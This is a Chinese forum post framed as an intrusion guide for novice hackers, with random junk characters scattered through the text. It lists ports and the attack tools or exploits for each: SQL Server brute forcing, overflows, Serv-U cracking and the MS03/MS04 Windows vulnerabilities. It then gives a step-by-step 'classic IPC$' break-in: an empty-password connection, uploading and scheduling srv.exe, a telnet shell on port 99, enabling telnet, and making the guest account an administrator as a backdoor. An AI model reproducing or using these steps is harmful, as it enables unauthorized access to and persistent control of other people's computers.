TA的每日心情 | 衰 2019-8-18 09:37 |
---|
签到天数: 2 天 [LV.1]初来乍到
|
来源:hi.baidu
8 E: A. b% V5 Y: W R) F* k1 R+ ~6 n希望对新手入侵有帮助!
8 n9 r; g0 p( W; ]- B i5 l% v& ] 1. 1433端口入侵1 Q3 A6 g u- X/ s8 j* w
scanport.exe 查有1433的机器
9 k9 q9 M9 J$ U' c: W SQLScanPass.exe 进行字典暴破(字典是关键)
, |5 z; o) a+ D6 w; C1 I' A, s 最后 SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。$ D4 k9 x& u2 L# ?/ T2 w( h1 Q
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
) i6 p0 z' f+ k1 E (以上反向的,测试成功)
3 S9 D4 E; T5 s sqlhelloz.exe 入侵ip 1433 (这个是正向连接)
- K3 I* U7 E2 e3 v 2. 4899端口入侵
7 O3 U, U) d6 o 用4899过滤器.exe,扫描空口令的机器& b" a) B% E, [( @! N1 O5 O
3. 3899的入侵# _; d% ?" N _% i
对很早的机器,可以试试3389的溢出(win3389ex.exe)
6 O) Q& \! l6 I1 H0 c0 G9 W 对2000的机器,可以试试字典暴破。(tscrack.exe)
, m5 D N) v/ M 4. 80入侵6 o B _9 a/ d5 y
对sp3以前的机器,可以用webdav入侵;
5 ^+ T4 Z# P/ d% z; R 对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
( p9 J6 S2 I8 o" ~( V' e1 u4 ] 可以利用SQL进行注入。(啊D的注入软件)。
+ e4 o! M3 Q6 o+ W 5. serv-u入侵(21端口)
+ B$ H& l) L/ q5 G$ H6 }) A 对5. 004及以下系统,可用溢出入侵。(serv5004.exe)
' g" P& @; I8 t$ Q 对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
+ P7 f+ a& y: E 对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)8 {; \! q( Y7 W3 e* R' a
输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码; E' m( T5 y; ^* r9 Q4 o% t
6. 554端口
( G/ N% \- o6 M. y1 m9 a 用real554.exe入侵。6 I$ ~, y: O% S: A# P9 B, V: Z
7. 6129端口8 \2 y$ o# q! a6 Q9 x* [
用DameWare6129.exe入侵。% i% q+ u9 R2 N5 _: b# g
8. 系统漏洞
6 B$ l x" c) ?% \6 ?) N 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,进行溢出入侵。
2 N$ I$ o! G0 Z W' A, G9. 3127等端口
5 |% K1 T& i+ N) X% ~; \ e9 ^. N5 u8 L, b6 ~6 H
可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
3 H! n( k4 k) h9 Z" V 10. 其他入侵8 x K9 N A7 y; R! \( b; m5 b* T
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。7 T: H4 l- j) g3 y
! M1 F( l. C" R! E8 ] 经典IPC$入侵
5 M8 Z9 N) N T& |) C
! c' m0 h" k" ]4 I$ U0 m 1. C:\>net use $">\\127.0.0.1\IPC$ "" /user:"admintitrators"
A" r4 d# j! q: `& N 这是用"流光"扫到的用户名是administrators,密码为"空"的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。. K5 E4 S4 L* a! A5 O0 a
2. C:\>copy srv.exe $">\\127.0.0.1\admin$
* S$ W* T; e* A# r 先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。0 ]! S8 \: T* A8 n6 B% ~
3. C:\>net time file://127.0.0.1/
; C& X, r& ~# I3 I 查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。# \$ F) h- d' F1 g& R
4. C:\>at file://127.0.0.1/ 11:05 srv.exe, D+ K& P1 P: A: z( i$ i8 D* z2 P
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊.) N" ?" r) w6 }* p6 _' Y' B+ ?. C
5. C:\>net time file://127.0.0.1/
2 H) Q' h# Z% {1 C. J 再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。
! v6 ~3 _/ V4 y 6. C:\>telnet 127.0.0.1 99' j% \/ I) j8 m% @; ]/ S- n* O
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
6 f" y g! h5 B4 W 虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了6 M4 y% m. O; z
7.C:\>copy ntlm.exe $">\\127.0.0.1\admin$
- N& U' Q/ T( K& B/ o 用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
7 U* M" v8 q" n! o1 |; D5 } 8. C:\WINNT\system32>ntlm
* e: S R! n6 x! k! z 输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!# d+ `( S# o7 o% H# _: i( H
9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)为了以防万一,我们再把guest激活加到管理组
$ Y$ G5 Z7 Z- G 10. C:\>net user guest /active:yes$ f/ o4 v- e- J* S3 ~* [( [" k1 f
将对方的Guest用户激活! P( @0 Q# Y7 @- F+ s3 J. Z2 k; R
11. C:\>net user guest 1234" W; l- [. a' q8 J4 {9 F
将Guest的密码改为1234,或者你要设定的密码 ]5 D( T- H; u, E) _3 H2 \9 U
12. C:\>net localgroup administrators guest /add
- U" ]! c. O! v% h 将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机) |
|